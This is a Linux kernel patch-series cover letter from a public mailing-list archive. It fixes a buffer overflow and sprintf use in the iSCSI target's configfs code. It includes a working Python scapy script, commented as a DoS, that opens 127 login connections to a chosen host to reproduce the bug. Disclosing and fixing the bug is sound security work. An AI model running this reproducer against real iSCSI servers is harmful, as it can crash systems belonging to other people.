From: Konstantin Shelekhin <k.shelekhin@yadro.com>
To: Martin Petersen <martin.petersen@oracle.com>
Cc: <target-devel@vger.kernel.org>, <linux-scsi@vger.kernel.org>,
<linux@yadro.com>, Konstantin Shelekhin <k.shelekhin@yadro.com>
Subject: [PATCH 0/2] scsi: target: iscsi: Get rid of sprintf in iscsi_target_configfs.c
Date: Sat, 22 Jul 2023 18:26:36 +0300 [thread overview]
Message-ID: <20230722152657.168859-1-k.shelekhin@yadro.com> (raw)
This patch series cleanses iscsi_target_configfs.c of sprintf usage. The
first patch fixes the real problem, the second just makes sure we are on
the safe side from now on.
I've reproduced the issue fixed in the first patch by utilizing this
cool thing:
https://git.sr.ht/~kshelekhin/scapy-iscsi
Yeah, shameless promoting of my own tools, but I like the simplicity of
scapy and writing tests in C with libiscsi can be a little cumbersome.
Check it out:
#!/usr/bin/env python3
# Let's cause some DoS in iSCSI target
import sys
from scapy.supersocket import StreamSocket
from scapy_iscsi.iscsi import *
cpr = {
"InitiatorName": "iqn.2016-04.com.open-iscsi:e476cd9e4e59",
"TargetName": "iqn.2023-07.com.example:target",
"HeaderDigest": "None",
"DataDigest": "None",
}
spr = {
"SessionType": "Normal",
"ErrorRecoveryLevel": 0,
"DefaultTime2Retain": 0,
"DefaultTime2Wait": 2,
"ImmediateData": "Yes",
"FirstBurstLength": 65536,
"MaxBurstLength": 262144,
"MaxRecvDataSegmentLength": 262144,
"MaxOutstandingR2T": 1,
}
if len(sys.argv) != 3:
print("usage: dos.py <host> <port>", file=sys.stderr)
exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
isid = 0xB00B
tsih = 0
connections = []
for i in range(0, 127):
s = socket.socket()
s.connect((host, port))
s = StreamSocket(s, ISCSI)
ds = cpr if i > 0 else cpr | spr
lirq = ISCSI() / LoginRequest(isid=isid, tsih=tsih, cid=i, ds=kv2text(ds))
lirs = s.sr1(lirq)
tsih = lirs.tsih
connections.append(s)
input()
Konstantin Shelekhin (2):
scsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show
scsi: target: iscsi: Stop using sprintf in iscsi_target_configfs.c
drivers/target/iscsi/iscsi_target_configfs.c | 72 ++++++++++----------
1 file changed, 36 insertions(+), 36 deletions(-)
--
2.41.0
next reply other threads:[~2023-07-22 15:27 UTC|newest]
Thread overview: 5+ messages / expand[flat|nested] mbox.gz Atom feed top
2023-07-22 15:26 Konstantin Shelekhin [this message]
2023-07-22 15:26 ` [PATCH 1/2] scsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show Konstantin Shelekhin
2023-07-22 15:26 ` [PATCH 2/2] scsi: target: iscsi: Stop using sprintf in iscsi_target_configfs.c Konstantin Shelekhin
2023-07-31 16:13 ` [PATCH 0/2] scsi: target: iscsi: Get rid of " Martin K. Petersen
2023-08-08 2:50 ` Martin K. Petersen
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20230722152657.168859-1-k.shelekhin@yadro.com \
--to=k.shelekhin@yadro.com \
--cc=linux-scsi@vger.kernel.org \
--cc=linux@yadro.com \
--cc=martin.petersen@oracle.com \
--cc=target-devel@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).